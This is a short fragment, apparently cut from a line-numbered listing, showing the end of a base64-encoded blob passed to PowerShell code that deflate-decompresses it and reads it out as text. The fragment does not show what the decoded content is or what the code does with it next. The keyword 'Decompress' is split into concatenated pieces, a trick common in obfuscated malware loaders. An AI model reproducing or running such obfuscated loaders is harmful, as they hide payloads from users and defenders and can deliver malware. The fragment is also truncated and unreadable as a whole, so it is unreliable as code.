JTzX4PJS/VBtBImyn8T5KoD+Qg2YfCmK2g7lW4mtmH4JucNAviXdxE1rGabTArSzHUMWKLFvHhZTWWijcvL36Yy6W9cQKr599bwv5dqWVwPACr7wSyIUcWgbkjDAoftMOh4g0w/tRFxg8TBEGY1KI4yDSdOCOFXwF86tEsaDOc7CFDmWWDQbf+MY93AYdXMwJiax45urBmsHL/uejRWlGDweVVm7wnnsT/mwL/mIqAH//Hw==")))), [IO.Compression.CompressionMode]::("De" +"compress"))), [Text.Encoding]::ASCII)).ReadToEnd(); 2 | --------------------------------------------------------------------------------